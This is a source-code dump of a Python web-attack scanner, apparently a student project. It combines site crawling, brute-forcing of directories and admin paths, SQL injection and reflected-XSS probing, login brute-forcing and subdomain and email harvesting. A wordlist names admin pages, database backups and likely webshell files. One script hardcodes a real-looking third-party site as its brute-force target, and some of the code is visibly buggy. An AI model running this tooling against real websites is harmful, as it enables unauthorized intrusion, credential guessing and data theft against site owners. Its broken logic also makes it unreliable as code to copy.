├── .gitignore
├── AD_Scanner_Base.py
├── BruteXSS.py
├── Burp_force_directory.py
├── Burp_force_directory
    └── dictionary
    │   ├── ASP.txt
    │   ├── ASPX.txt
    │   ├── DIR.txt
    │   ├── JSP.txt
    │   ├── MDB.txt
    │   └── PHP.txt
├── PortScanner.py
├── README.md
├── Sqliscan
    ├── __init__.py
    ├── serverinfo.py
    ├── sqlerrors.py
    ├── std.py
    ├── useragents.py
    └── web.py
├── XSS_payload
    └── wordlist.txt
├── burp_user.py
├── data.txt
├── data1.txt
├── dict
    ├── password.txt
    ├── pinyin2.txt
    └── user.txt
├── index.py
├── reids_demo.py
├── scanner.py
├── static
    ├── css
    │   ├── bootstrap-theme.css
    │   ├── bootstrap-theme.css.map
    │   ├── bootstrap-theme.min.css
    │   ├── bootstrap-theme.min.css.map
    │   ├── bootstrap.css
    │   ├── bootstrap.css.map
    │   ├── bootstrap.min.css
    │   ├── bootstrap.min.css.map
    │   ├── style.css
    │   └── style2.css
    ├── fonts
    │   ├── glyphicons-halflings-regular.eot
    │   ├── glyphicons-halflings-regular.svg
    │   ├── glyphicons-halflings-regular.ttf
    │   ├── glyphicons-halflings-regular.woff
    │   └── glyphicons-halflings-regular.woff2
    ├── images
    │   └── banner.jpg
    └── js
    │   ├── bootstrap.js
    │   ├── bootstrap.min.js
    │   ├── jquery.min.js
    │   └── npm.js
├── tHar_lib
    ├── __init__.py
    ├── engine_search.py
    ├── graphs.py
    ├── hostchecker.py
    ├── htmlExport.py
    ├── markup.py
    ├── myparser.py
    └── port_scanner.py
├── templates
    ├── AD.html
    └── content.html
├── test.py
├── the_harvest.py
└── url_spider.py


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | env/
 12 | build/
 13 | develop-eggs/
 14 | dist/
 15 | downloads/
 16 | eggs/
 17 | .eggs/
 18 | lib/
 19 | lib64/
 20 | parts/
 21 | sdist/
 22 | var/
 23 | wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | 
 49 | # Translations
 50 | *.mo
 51 | *.pot
 52 | 
 53 | # Django stuff:
 54 | *.log
 55 | local_settings.py
 56 | 
 57 | # Flask stuff:
 58 | instance/
 59 | .webassets-cache
 60 | 
 61 | # Scrapy stuff:
 62 | .scrapy
 63 | 
 64 | # Sphinx documentation
 65 | docs/_build/
 66 | 
 67 | # PyBuilder
 68 | target/
 69 | 
 70 | # Jupyter Notebook
 71 | .ipynb_checkpoints
 72 | 
 73 | # pyenv
 74 | .python-version
 75 | 
 76 | # celery beat schedule file
 77 | celerybeat-schedule
 78 | 
 79 | # SageMath parsed files
 80 | *.sage.py
 81 | 
 82 | # dotenv
 83 | .env
 84 | 
 85 | # virtualenv
 86 | .venv
 87 | venv/
 88 | ENV/
 89 | 
 90 | # Spyder project settings
 91 | .spyderproject
 92 | .spyproject
 93 | 
 94 | # Rope project settings
 95 | .ropeproject
 96 | 
 97 | # mkdocs documentation
 98 | /site
 99 | 
100 | # mypy
101 | .mypy_cache/
102 | *.iml
103 | *.xml
104 | scanner.py
105 | scanner.py
106 | 


--------------------------------------------------------------------------------
/AD_Scanner_Base.py:
--------------------------------------------------------------------------------
  1 | #Author:Chernobyl   2018/5/28
  2 | from url_spider import *
  3 | from Burp_force_directory import *
  4 | from scanner import *
  5 | from the_harvest import *
  6 | from burp_user import *
  7 | from BruteXSS import *
  8 | import re
  9 | import os
 10 | import sys
 11 | import getopt
 12 | import argparse
 13 | import redis
 14 | import _thread
 15 | import time
 16 | import json
 17 | 
 18 | 
 19 | def terminal_input():
 20 |     '''
 21 |     命令行输入处理函数
 22 |     传入参数：无
 23 |     返回值：包含参数和对应值的dict
 24 | 
 25 |     命令行参数：
 26 |         -u/--url= : 传入的URL
 27 |         -h ：帮助
 28 |         --spider-threads : 爬虫线程
 29 |         --burp-threads : 目录爆破线程
 30 |         -S : 爬虫参数
 31 |         -I : SQLMAP参数
 32 |         -B : 目录爆破参数
 33 |         --cookie : 手动输入cookie
 34 |         --file : 输出文件名
 35 | 
 36 |     '''
 37 |     ter_opt={}
 38 |     if len(sys.argv) == 1:
 39 |         sys.argv.append('-h')
 40 |     parser = argparse.ArgumentParser(description='AnD Web Scanner',add_help=True)
 41 |     parser.add_argument('-u','--url',help='目标url')
 42 |     parser.add_argument('--login_url',default=None,help='账户爆破URL')
 43 |     parser.add_argument('--cookie',default=None,help='扫描器cookie')
 44 |     parser.add_argument('-F','--file',default=None,help='输出目标文件')
 45 |     parser.add_argument('-S','--spider_args',default=None,help='全站爬虫模块方法(craw)')
 46 |     parser.add_argument('--spider_threads',default=10,help='全站爬虫模块线程数',type=int)
 47 |     parser.add_argument('-I','--sqli_args',default=None,help='SQL注入漏洞扫描模块方法(run)')
 48 |     parser.add_argument('-B','--burp_args',default=None,help='路径爆破模块方法(run)')
 49 |     parser.add_argument('--burp_threads',default=10,help='路径爆破模块线程数',type=int)
 50 |     parser.add_argument('-R','--harvest_args',default=None,help='子域名收集模块参数(search)')
 51 |     parser.add_argument('-U','--burp_user_args',default=None,help='用户爆破模块参数(burp)')
 52 |     parser.add_argument('-X','--burp_XSS_args',default=None,help='XSS模块参数(run)')
 53 | 
 54 |     parser.add_argument
 55 |     parser.add_argument('--debug',default=None,help='开启Debug模式')
 56 |     args = parser.parse_args()
 57 |     for x,y in args._get_kwargs():
 58 |         ter_opt[x]=y
 59 |     return ter_opt
 60 | 
 61 | 
 62 | class base:
 63 |     '''
 64 |     参数：扫描网址
 65 |     '''
 66 |     def url_check(self,url):
 67 |         '''
 68 |         URL检测函数
 69 |         传入参数：待检测的URL
 70 |         返回值：无
 71 | 
 72 |         URL类型：
 73 |         Case0:http://www.test.com/...||https://www.test.com/...
 74 |         Case1:http://test.com/...||https://test.com/...
 75 |         Case1:www||aaa.test.com/.....
 76 |         Case2:test.com/...
 77 |         other:error
 78 |         '''
 79 |         if re.match('(http|https)://(.*?)\.(.*?)\.(.*)',url) != None: #Case0:
 80 |             self.url = url
 81 |             self.base_redis.hset('base','url',url)
 82 |             self.base_redis.hset('base','url_type',0)
 83 | 
 84 |         if re.match('(http|https)://(.*?)\.(.*)',url) != None: #Case1:
 85 |             self.url = url
 86 |             self.base_redis.hset('base','url',url)
 87 |             self.base_redis.hset('base','url_type',1)
 88 | 
 89 |         elif re.match('(.*?)\.(.*?)\.(.*)',url) != None:#case 2
 90 |             self.url = url
 91 |             self.base_redis.hset('base','url',url)
 92 |             self.base_redis.hset('base','url_type',2)
 93 |         elif re.match('(.*?)\.(.*)',url) != None:#case 3:
 94 |             self.url = url
 95 |             self.base_redis.hset('base','url',url)
 96 |             self.base_redis.hset('base','url_type',3)
 97 |         else:
 98 |             print('URL Type Error!')
 99 |             sys.exit(1)#URL_ERROR
100 | 
101 |     def opt_handler(self):
102 |         '''命令行参数处理
103 |         针对各模块特有设置项，设置相应键值对，用于初始化和存储信息
104 |         '''
105 |         #所有参数传入redis
106 |         for x in self.info.keys():
107 |             if self.info[x] != None:
108 |                 self.base_redis.hset('base',x,self.info[x])
109 |         print('optiopns:\n')
110 |         for x in self.base_redis.hkeys('base'):
111 |             print(x+':'+self.base_redis.hget('base',x))
112 |         self.output_dict={}
113 |         if self.info['spider_args'] == 'craw':
114 |             self.output_dict['Url_Spider'] = 'Spider_full_urls'
115 |         if self.info['burp_args'] == 'run':
116 |             self.output_dict['Burp_force_directory'] = 'Burp_force_directory_url'
117 |         if self.info['sqli_args'] == 'run':
118 |             self.output_dict['Sqli_scanner'] = 'Vulnerable_urls'
119 |         if self.info['harvest_args'] == 'search':
120 |             self.output_dict['the_harvest'] = ['Harvest_subdomain','Harvest_emails']
121 |         if self.info['burp_user_args'] == 'burp' and self.info['login_url'] != None:
122 |             self.output_dict['burp_user'] = True
123 |         if self.info['burp_XSS_args'] == 'run':
124 |             self.output_dict['XSS'] = 'XSS_hole'
125 | 
126 |         print('go')
127 |         time.sleep(1)
128 | 
129 |         '''处理输出文件'''
130 |         if self.info['file'] != None:
131 |             self.file_status = True
132 | 
133 |     def print_data(self):
134 |         '''格式化输出模块返回的数据
135 |         格式：模块名
136 |              --------
137 |              数据
138 |         '''
139 | 
140 |         #如果传入了输出文件的参数则打开相应的文件
141 |         if self.file_status :
142 |             self.data_file = self.info['file']
143 |             self.data_file = open(self.data_file,'w')
144 | 
145 |         print('URL:'+self.url+'\n')
146 |         if self.file_status:
147 |             print('URL:'+self.url+'\n',file=self.data_file)
148 | 
149 |         for x in self.output_dict.keys():
150 |             num = 0
151 |             print('\n\n'+x+':\n--------------------------------------')
152 |             if self.file_status:
153 |                 print('\n\n'+x+':\n--------------------------------------',file=self.data_file)
154 |             if x == 'the_harvest':
155 |                 for x,y in zip(self.base_redis.smembers(self.output_dict[x][0]),self.base_redis.smembers(self.output_dict[x][1])):
156 |                     print(str(num+1)+':  domain:'+str(x)+'    mail:'+str(y))
157 |                     if self.file_status:
158 |                         print(str(num+1)+':  domain:'+str(x)+'    mail:'+str(y),file=self.data_file)
159 |                 continue
160 | 
161 |             if x == 'burp_user':
162 |                 print('account: '+self.base_redis.hget('burp_user', 'user')+  'password: '+self.base_redis.hget('burp_user', 'password'))
163 |                 if self.file_status:
164 |                     print('account: '+self.base_redis.hget('burp_user', 'user')+  'password: '+self.base_redis.hget('burp_user', 'password'),file=self.data_file)
165 |                 continue
166 | 
167 |             for y in self.base_redis.smembers(self.output_dict[x]):
168 |                 if x != 'Sqli_scanner' :
169 |                     print(str(num+1)+':'+y)
170 |                     if self.file_status:
171 |                         print(str(num+1)+':'+y,file=self.data_file)
172 |                     num+=1
173 | 
174 |                 else:
175 |                     tmp = json.loads(y)
176 |                     print('url:'+str(tmp['url'])+'  database:'+str(tmp['db'])+'  server:'+str(tmp['server']))
177 |                     if self.file_status:
178 |                         print('url:'+str(tmp['url'])+'  database:'+str(tmp['db'])+'  server:'+str(tmp['server']),file=self.data_file)
179 | 
180 |         if self.file_status :
181 |             self.data_file.close()
182 | 
183 |     def __init__(self):
184 |         self.info = terminal_input()
185 |         self.url = self.info['url']
186 |         self.lg_url = self.info['login_url']
187 |         self.file_status = False
188 |         self.save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)#开启本地radis
189 |         self.base_redis = redis.Redis(connection_pool=self.save_pool)
190 |         self.base_redis.flushdb()
191 |         self.url_check(self.url)
192 |         self.url_type = self.base_redis.hget('base','url_type')
193 |         self.opt_handler()
194 |         '''各模块初始化'''
195 |         #对传入的URL进行处理，增加http://前缀
196 |         if self.url_type == '2' or self.url_type == '3':
197 |             self.url = 'http://'+self.url
198 |         self.spider = SpiderMain(self.url,self.save_pool)
199 |         self.burp_force_diectory = Scanner(self.url,self.save_pool)
200 |         self.sqli = SqliMain(self.save_pool)
201 |         self.harvest = TheHarvester(self.url,self.save_pool)
202 |         self.burp_user = BurpUser(self.lg_url,self.save_pool)
203 |         self.burp_XSS = BruteXSS(self.save_pool)
204 | 
205 |     def start_modules(self):
206 |         '''多线程执行模块的运行方法'''
207 |         _thread.start_new_thread(self.spider.run,())
208 |         _thread.start_new_thread(self.burp_force_diectory.more_threads,())
209 |         _thread.start_new_thread(self.sqli.run,())
210 |         _thread.start_new_thread(self.harvest.start_search,())
211 |         _thread.start_new_thread(self.burp_user.run,())
212 |         _thread.start_new_thread(self.burp_XSS.run,())
213 | 
214 | 
215 |     def module_check(self):
216 |         '''查询模块的线程是否执行完成'''
217 |         return_list=[]
218 |         if self.info['spider_args'] == 'craw':
219 |             return_list.append(self.spider.is_finished())
220 |         if self.info['burp_args'] == 'run':
221 |             return_list.append(self.burp_force_diectory.is_finished())
222 |         if self.info['sqli_args'] == 'run':
223 |             return_list.append(self.sqli.is_finished())
224 |         if self.info['harvest_args'] == 'search':
225 |             return_list.append(self.harvest.is_finished())
226 |         if self.info['burp_user_args'] == 'burp':
227 |             return_list.append(self.burp_user.is_finished())
228 |         if self.info['burp_XSS_args'] == 'run':
229 |             return_list.append(self.burp_XSS.is_finished())
230 |         return return_list
231 | 
232 | 
233 | #if '__name__' == '__main__':
234 | ma = base()
235 | ma.start_modules()
236 | timer=0
237 | while False in ma.module_check() :
238 |     print('time=%d  stat:'%(timer),end=' ')
239 |     for x in ma.output_dict.keys():
240 |         print('  '+x+':',end='')
241 |         if x == 'Url_Spider':
242 |             print(ma.spider.is_finished(),end='')
243 |         elif x == 'Burp_force_directory':
244 |             print(ma.burp_force_diectory.is_finished(),end='')
245 |         elif x == 'Sqli_scanner':
246 |             print(ma.sqli.is_finished(),end='')
247 |         elif x == 'the_harvest':
248 |             print(ma.harvest.is_finished(),end='')
249 |         elif x == 'burp_user':
250 |             print(ma.burp_user.is_finished(),end='')
251 |         elif x == 'XSS':
252 |             print(ma.burp_XSS.is_finished(),end='')
253 |     print(' ',end='\r')
254 |     time.sleep(5)
255 |     timer+=5
256 |     continue
257 | os.system('cls')
258 | print('finished')
259 | ma.print_data()
260 | input()
261 | 


--------------------------------------------------------------------------------
/BruteXSS.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #-*-coding:utf8-*-
  3 | #!BruteXSS
  4 | #!author: Dlangman
  5 | '''
  6 | v0.1easy
  7 | GET方法对url进行解析，将url分解出value。然后对value进行XSS，
  8 |     检测机制是检查response中是否有插入信息，所以payload很重要，不能乱改payload文件。
  9 | '''
 10 | 
 11 | import http.client
 12 | import urllib.request, urllib.parse, urllib.error
 13 | import urllib.parse
 14 | import threading
 15 | import redis
 16 | import sys
 17 | 
 18 | class BruteXSS(object):
 19 | 
 20 |     def __init__(self, savepool):
 21 |         self.redis_out = '' #输出给共享池的
 22 |         self.isfinish = False #是否跑完
 23 |         self.save_pool = savepool # 开启本地radis
 24 |         self.pool = redis.Redis(connection_pool=self.save_pool)  # 创建一个连接实例
 25 | 
 26 |         self.thread_num = 50
 27 |         self.thread_max = threading.BoundedSemaphore(self.thread_num)
 28 | 
 29 |     def run(self):
 30 |         '''
 31 |         获取base 参数 burp_XSS_args
 32 |         :return:
 33 |         '''
 34 |         action = self.pool.hget('base', 'burp_XSS_args')
 35 |         if action == 'run':
 36 |             self.brute()
 37 | 
 38 |     def brute(self):
 39 |         old_url =[]
 40 |         while self.pool.get('spider_redis') == 'False':
 41 |             urls = self.pool.smembers("Spider_full_urls")
 42 |             for url in urls :
 43 |                 if url not in old_url:
 44 |                     self.thread_max.acquire()
 45 |                     url_real = threading.Thread(target=self.GET,args=(url,))
 46 |                     url_real.start()
 47 |                     url_real.join()
 48 |             old_url = urls
 49 | 
 50 |         self.isfinish = True
 51 | 
 52 |     def is_finished(self):
 53 |         return self.isfinish
 54 | 
 55 |     def Redis_Outputer(self):
 56 |         '''
 57 |         键设置为 :XSS_hole
 58 |         :return:
 59 |         '''
 60 |         self.pool.sadd('XSS_hole', self.redis_out)
 61 | 
 62 | 
 63 |     def wordlistimport(self, file,lst):
 64 |         try:
 65 |             with open(file,'r') as f:
 66 |                 '''
 67 |                 访问payload文件，并将结果存入lst[]中
 68 |                 '''
 69 |                 for line in f:
 70 |                     final = str(line.replace("\n",""))
 71 |                     lst.append(final)
 72 |         except IOError:
 73 |             print("[!] Wordlist not found!")
 74 | 
 75 |     def GET(self, url):
 76 |         try:
 77 |             try:
 78 |                 #print(threading.current_thread(),url)
 79 |                 site = url
 80 |                 if 'https://' in site or 'http://' in site:
 81 |                     pass
 82 |                 else:
 83 |                     site = "http://" +site
 84 | 
 85 |                 finalurl = urllib.parse.urlparse(site) #分割url为几部分
 86 |                 domain0 = '{uri.scheme}://{uri.netloc}'.format(uri=finalurl)
 87 |                 domain = domain0.replace("https://","").replace("http://", "").replace("www.", "").replace("/","")
 88 | 
 89 |                 #print("[+] Checking if " + domain + " is available")
 90 |                 connection = http.client.HTTPConnection(domain)
 91 |                 connection.connect()
 92 |                 #print("[+] "+ domain +" is available!")
 93 | 
 94 |                 url = site
 95 |                 paraname =[]
 96 |                 wordlist = 'XSS_payload/wordlist.txt'
 97 | 
 98 |                 payloads = []
 99 |                 self.wordlistimport(wordlist,payloads) #把payload放进[]里
100 | 
101 |                 parameters = urllib.parse.parse_qs(finalurl.query,keep_blank_values=True)
102 |                 path = finalurl.scheme+"://"+finalurl.netloc+finalurl.path  #网址路径
103 |                 for para in parameters:
104 |                     paraname.append(para)
105 | 
106 |                 for pn in paraname:
107 |                     # print("[+] Testing "+pn+ " parameter...")
108 |                     for x in payloads:
109 |                         enc = urllib.parse.quote_plus(x)
110 |                         data = path +"?"+pn +"=" +enc  #在网址路径上补上参数
111 |                         page = urllib.request.urlopen(data)
112 |                         sourececode = page.read().decode()
113 |                         if x in sourececode: #如果输入的内容完整在网页里，则认为是存在XSS
114 |                             print(("\n[!] XSS Vulnerability Found!\n"+"value: "+pn +" \npayload: " +x))
115 |                             self.redis_out = url +" "+ pn +" "+ x
116 |                             self.Redis_Outputer()
117 | 
118 |                             break
119 | 
120 |             except(http.client.HTTPResponse) as Exit:
121 |                 print(("[!] Site"+domain +" is offline"))
122 |         except(KeyboardInterrupt) as Exit:
123 |                 print("\nExit...")
124 |         self.thread_max.release()
125 | 
126 | if __name__ == '__main__':
127 |     url = 'http://localhost/crack_demo.php?value=aaaa&pwd=#'
128 |     savepool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)
129 |     brute = BruteXSS(savepool)
130 |     print(brute.is_finished())
131 |     brute.run()
132 |     print(brute.is_finished())


--------------------------------------------------------------------------------
/Burp_force_directory.py:
--------------------------------------------------------------------------------
  1 | #Burp_force_directory by xuxu
  2 | import requests
  3 | import threading
  4 | import redis
  5 | import os
  6 | import time
  7 | from urllib.parse import urlparse
  8 | 
  9 | class Scanner():
 10 |     def __init__(self, url, save_pool):
 11 |         self.burp_redis = redis.Redis(connection_pool=save_pool)
 12 |         self.url = self.Urlparse(url)
 13 |         self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
 14 |                                       'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'}
 15 |         self.dic_list = []      #字典名目录
 16 |         self.get_url = []       #获取到的所存在的url
 17 |         self.get_url_len = 0    #获取到的有效url数量（可重复）
 18 |         self.len = 0            #获取到的有效url数量（不重复）
 19 |         self.threads_max = self.get_threads()   # 最大线程数
 20 |         self.check = False      #线程运行状态
 21 | 
 22 |     def Urlparse(self, url):
 23 |         '''
 24 |         把传入的url进行截取，只要scheme + netloc部分
 25 |         :return:
 26 |         '''
 27 |         k = urlparse(url)
 28 |         l = (k[0] + '://' + k[1])
 29 |         return l.rstrip()
 30 | 
 31 |     def get_threads(self):
 32 |         '''
 33 |         从redis中取线程数，如果返回为None，则默认50
 34 |         '''
 35 |         return int(self.burp_redis.hget('base','burp_threads'))
 36 | 
 37 |     def run(self):
 38 |         '''
 39 |         获取base模块的参数，决定是否运行
 40 |         :return:
 41 |         '''
 42 |         key = self.burp_redis.hget('base','burp_arg')
 43 |         if key == 'run':
 44 |             self.more_threads()
 45 | 
 46 | 
 47 |     def get_dic(self):
 48 |         '''
 49 |         获取字典目录下的文件名到self.dic_list
 50 |         增加把相对路径换成绝对路径的功能
 51 |         :return:
 52 |         '''
 53 |         for root, files, self.dic_list in os.walk('./Burp_force_directory/dictionary'):
 54 |             pass
 55 | 
 56 |     def more_threads(self):
 57 |         self.get_dic()
 58 |         threads = []
 59 |         self.check = False
 60 |         for k in range(0,len(self.dic_list)):
 61 |             print(self.dic_list[k])
 62 |             #t = threading.Thread(target=self.combine_url,args=(self.dic_list[k],))
 63 |             #threads.append(t)
 64 |             self.combine_url(self.dic_list[k])
 65 | 
 66 |         for k in threads:
 67 |             k.start()
 68 | 
 69 |         #for k in threads:
 70 |             #k.join()
 71 | 
 72 |         self.check = True
 73 | 
 74 |     def combine_url(self,doc_name):
 75 |         '''
 76 |         从字典中逐行取出子目录，并将其与传入的网址组合
 77 |         '''
 78 |         #print(doc_name)
 79 |         with open(os.getcwd() + r'\Burp_force_directory\dictionary\\'+doc_name,'r') as file_obj:
 80 |             for line in file_obj:
 81 |                 test_url = self.url + line
 82 |                 # print(test_url)
 83 |                 if threading.activeCount() >= self.threads_max:
 84 |                     time.sleep(0.7)
 85 |                 else:
 86 |                     t = threading.Thread(target=self.judge, args=(test_url.rstrip(),))
 87 |                     t.start()
 88 |                     # t.join()
 89 |                     # print(threading.activeCount())
 90 |                     # self.judge(test_url.rstrip())
 91 | 
 92 |     def judge(self, test_url):
 93 |         '''
 94 |         判断所传入的连接是否存在
 95 |         '''
 96 |         try:
 97 |             #print(test_url)
 98 |             k = self.request(test_url)
 99 |             #print(k.status_code)
100 |             if k.status_code == 200:
101 |                 print(test_url)
102 |                 '''
103 |                 self.get_url.append(test_url)
104 |                 self.len = len(set(self.get_url))
105 |                 print(self.len,self.get_url_len)
106 |                 if self.len > self.get_url_len:
107 |                     self.get_url_len = self.len
108 |                 '''
109 |                 if test_url in self.get_url:
110 |                     pass
111 |                 else:
112 |                     self.get_url.append(test_url)
113 |                     '''
114 |                     try:
115 |                         self.burp_redis.hset('Burp_force_directory_scanned_url','scanned_url',self.get_url)
116 |                         print(self.burp_redis.hget('Burp_force_directory','scanned_url'))
117 |                     except Exception as p:
118 |                         pass
119 |                         #测试模式下开启报错
120 |                         #print(p)
121 |                     '''
122 | 
123 | 
124 |                 try:
125 |                     print(test_url)
126 |                     self.burp_redis.sadd('Burp_force_directory_url',test_url)
127 |                 except Exception as e:
128 |                     print(e)
129 | 
130 |         except requests.exceptions.Timeout:
131 |             pass
132 |         except Exception as e:
133 |             pass
134 |             #测试模式下开启报错输出
135 |             #print(e)
136 | 
137 | 
138 |     def request(self, test_url):
139 |         '''
140 |         用get方法会请求整个【头部+正文】，浪费资源
141 |         利用head方法，只请求【资源头部】
142 |         '''
143 |         r = requests.head(test_url, headers=self.headers, timeout=1)
144 |         return r
145 | 
146 |     def print_get_url(self):
147 |         self.print_get_url = set(self.print_get_url)
148 |         print(self.get_url)
149 | 
150 |     def is_finished(self):
151 |         return self.check
152 | 
153 | 
154 | if __name__ == '__main__':
155 |     save_pool = redis.ConnectionPool(host='127.0.0.1', port=6379, decode_responses=True)#开启本地radis
156 |     url = 'http://www.sdlongli.com'
157 |     Web_scanner = Scanner(url,save_pool)
158 |     Web_scanner.more_threads()
159 |     print(Web_scanner.burp_redis.hget('Burp_force_directory','scanned_url'))
160 |     #print(Web_scanner.module_redis.hget('Burp_force_directory','scanned_url'))
161 | 


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/ASP.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Burp_force_directory/dictionary/ASP.txt


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/ASPX.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Burp_force_directory/dictionary/ASPX.txt


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/DIR.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Burp_force_directory/dictionary/DIR.txt


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/JSP.txt:
--------------------------------------------------------------------------------
  1 | /FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
  2 | /fccmsres/admin/default.jsp
  3 | /login.jsp
  4 | /luntanLogin.jsp
  5 | /domain_manage.jsp
  6 | /s8main.jsp
  7 | /login/index.jsp
  8 | /admin/index.jsp
  9 | /message/admin_login.jsp
 10 | /admin.jsp
 11 | /cms/admin.jsp
 12 | /admin/admin.jsp
 13 | /manage/admin.jsp
 14 | /plc/admin.jsp
 15 | /EducationManager/admin.jsp
 16 | /bbs-admin.jsp
 17 | /login/admin.jsp
 18 | /book/admin.jsp
 19 | /servicesystem/login-admin.jsp
 20 | /login-admin.jsp
 21 | /admins/admin.jsp
 22 | /newsadmin/admin.jsp
 23 | /user/admin.jsp
 24 | /orderadmin/admin.jsp
 25 | /penit-admin.jsp
 26 | /clearadmin/admin.jsp
 27 | /WebAdmin/admin.jsp
 28 | /relogin-admin.jsp
 29 | /manage/index.jsp
 30 | /oa/login.jsp
 31 | /oa/admin_login.jsp
 32 | /coon.jsp
 33 | /adminis/login.jsp
 34 | /02nfdiy.jsp
 35 | /0x5emyup.jsp
 36 | /1.jsp
 37 | /1/1/gif.jsp
 38 | /10f4digshell0.jsp
 39 | /11.jsp
 40 | /111.jsp
 41 | /11111/index.jsp
 42 | /115cn.jsp
 43 | /123.jsp
 44 | /1234.jsp
 45 | /12345.jsp
 46 | /123456.jsp
 47 | /12912.jsp
 48 | /1dppdiy.jsp
 49 | /1hmmdigshell2.jsp
 50 | /1iyydiy.jsp
 51 | /1ndex.jsp
 52 | /1tufmyup.jsp
 53 | /1uuqmyup.jsp
 54 | /2005kycj/2005kycj/login.jsp
 55 | /2006.jsp
 56 | /21ex/jihe.jsp
 57 | /22.jsp
 58 | /222.jsp
 59 | /2ir9myup.jsp
 60 | /2m8ydigshell0.jsp
 61 | /2r8idiy.jsp
 62 | /3.jsp
 63 | /30wfdigshell0.jsp
 64 | /33.jsp
 65 | /333.jsp
 66 | /3800cc.jsp
 67 | /3upxmyup.jsp
 68 | /41x6digshell0.jsp
 69 | /47rfmyup.jsp
 70 | /4fpndigshell0.jsp
 71 | /4p5xdiy.jsp
 72 | /5u3qdigshell0.jsp
 73 | /5xc4diy.jsp
 74 | /6crwdiy.jsp
 75 | /6k.jsp
 76 | /6qv4myup.jsp
 77 | /6yaqmyup.jsp
 78 | /79hlmyup.jsp
 79 | /7am5xiao.jsp
 80 | /7hsfdigshell0.jsp
 81 | /8000/welcome.jsp
 82 | /8080/anything.jsp
 83 | /8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
 84 | /80f9digshell0.jsp
 85 | /87d6diy.jsp
 86 | /88888/index.jsp
 87 | /89wjdiy.jsp
 88 | /8vt2digshell0.jsp
 89 | /8wr8myup.jsp
 90 | /92vrmyup.jsp
 91 | /9g42shell.jsp
 92 | /ASPAdmin.jsp
 93 | /ASPAdmin_A.jsp
 94 | /ASPXspy2.jsp
 95 | /A_Login.jsp
 96 | /AddNews.jsp
 97 | /Admin.jsp
 98 | /Admin/Admin_Index.jsp
 99 | /Admin/Database/%23tourdata.jsp
100 | /Admin/Database/%23tourdatabak.jsp
101 | /AdminCenter/AdminLogin.jsp
102 | /AdminFile/Admin_Login.jsp
103 | /AdminLogin1.jsp
104 | /AdminMain.jsp
105 | /AdminMenu.jsp
106 | /AdminUserModule/AdminUserLogin.jsp
107 | /Admin_BatchLink.jsp
108 | /Admin_Cy/DataBackup/DataBack.jsp
109 | /Admin_Cy/DataCy/%23%23cyweb_cn.jsp
110 | /Admin_Cy/Zzm.jsp
111 | /Admin_DataBackup.jsp
112 | /Admin_Database.jsp
113 | /Admin_Field.jsp
114 | /Admin_Help_User.jsp
115 | /Admin_Label.jsp
116 | /Admin_Login588.jsp
117 | /Admin_Login8.jsp
118 | /Admin_Login888.jsp
119 | /Admin_Maillist.jsp
120 | /Admin_Message.jsp
121 | /Admin_Photo.jsp
122 | /Admin_SoftCateMenu.jsp
123 | /Admin_SoftInfo.jsp
124 | /Admin_SoftLink.jsp
125 | /Admin_SoftList.jsp
126 | /Admin_SubCate.jsp
127 | /Admin_UpdateSoftNum.jsp
128 | /Admin_UploadFile.jsp
129 | /Admin_UploadFile_Style.jsp
130 | /Admin_UserSetting.jsp
131 | /Admin_ZgTea_Art/Login.jsp
132 | /Admin_jsCreate.jsp
133 | /Administration/Default.jsp
134 | /Article/admin/login.jsp
135 | /ArticleShow.jsp
136 | /Articlelogin.jsp
137 | /CEO.jsp
138 | /Char.jsp
139 | /CmsEditor/Upload.jsp
140 | /Comment.jsp
141 | /Connections/Connections.jsp
142 | /Connections/baseinc.jsp
143 | /Connections/cnn.jsp
144 | /Connections/conn.jsp
145 | /ConsoleHelp/login.jsp
146 | /Create_Commend.jsp
147 | /Create_Default.jsp
148 | /Create_New.jsp
149 | /Create_Other.jsp
150 | /Create_SoftCate.jsp
151 | /Create_SoftList_All.jsp
152 | /Create_SoftList_Cate.jsp
153 | /Create_jsNews.jsp
154 | /Create_jsSearch.jsp
155 | /DATA/%23echuang%23.jsp
156 | /Data.project/%23zxData.project%23.jsp
157 | /Data/%23vvskybbs.jsp
158 | /Data/MeCMS_data.jsp
159 | /Data/YxBBs.jsp
160 | /Data/db.jsp
161 | /Data/wrtxcnshop2.jsp
162 | /DataBackup/1.jsp
163 | /DataBackup/111.jsp
164 | /DataBackup/123.jsp
165 | /DataBackup/222.jsp
166 | /DataBackup/ASPAdmin.jsp
167 | /DataBackup/ASPAdmin_A.jsp
168 | /DataBackup/a.jsp
169 | /DataBackup/aa.jsp
170 | /DataBackup/ad.jsp
